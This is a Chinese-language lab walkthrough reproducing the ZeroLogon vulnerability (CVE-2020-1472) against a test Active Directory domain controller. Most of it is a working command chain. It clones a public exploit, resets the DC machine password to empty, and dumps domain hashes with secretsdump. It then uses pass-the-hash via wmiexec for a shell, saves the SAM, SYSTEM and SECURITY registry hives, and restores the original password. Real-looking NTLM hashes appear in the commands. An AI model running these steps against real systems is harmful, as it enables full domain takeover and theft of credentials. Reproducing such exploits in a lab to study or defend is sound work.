CVE-2020-1472-ZeroLogon复现

CVE-2020-1472-ZeroLogon复现

简介

Netlogon使用的AES认证算法中的vi向量默认为0，导致攻击者可以绕过认证，同时其设置域控密码的远 程接口也使用了该函数，导致可以将域控中保存在AD中的管理员password设置为空

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012 Windows Server 2012 (Server Core installation)

Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation)

Windows Server 2016 Windows Server 2016 (Server Core installation)

Windows Server 2019 Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

环境

ad01：10.10.10.137

12server4 : 10.10.10.158

使用zerologin脚本复现

复现过程

检测是否存在CVE

python3 zerologon_tester.py ad01 10.10.10.137
1

漏洞利用 下载exp： git clone https://github.com/dirkjanm/CVE-2020-1472

置空DC的密码 python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR

python3 cve-2020-1472-exploit.py ad01 10.10.10.137
1

获取HASH 使用impacket包中的secretsdum.py来获取相关的HASh python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -no-pass

python3 secretsdump.py redteam.club/ad01\$@10.10.10.137 -no-pass
1

获取shell

获取HASH后，可以利用wmiexec.py登录，从而获取一个SHELL

python wmiexec.py -hashes  DOMAIN/DOMAIN_USER@DC_IP_ADDR
1

python3 wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387
redteam.club/administrator@10.10.10.137
1
2
3

恢复原HASH 导出sam

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
1
2
3
4
5
6
7
8
9
10

获取hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save
LOCAL
1
2

执行以下命令，获取SAM中原来的HASH

python3 reinstall_original_pw.py ad01 10.10.10.137 beb48bc166e17cffa58c516edaca4134d4c8e546a78a30987c5acd858799d004c35acac9f28290bedac21a5ae254affbb82a4371bd5cca19ffb0a7c4d0219826710169daa1dbcd38ad997f72337ba94d0ad7aa6c79f3b7af38a4b39c6cb989431424884548ee6c61f52253f251986f91420ccb0fd8e914fa36b905e46700aa292fc673d641cc5e12fead07102bb2dcfcc92aba45a250a6a7dfac5b2f0a4aa15a90ec8f3959a4a57289eeb5b417c13c219a34d8bfde459342ad6a196efad6a7b04c6261f27340d31320faab63118cf24d2ac2ef6bf728c7855720d230142f5730a9481649051ce8af41ba8e706a777bc7
1

检测域密码

python3 secretsdump.py ad01.redteam.club/administrator@10.10.10.137 -hashes
:747f92f9bf20a4fc930afc4dadf53bdc
1
2

当你真正想做成一件事情的时候，就连天地万物都会帮你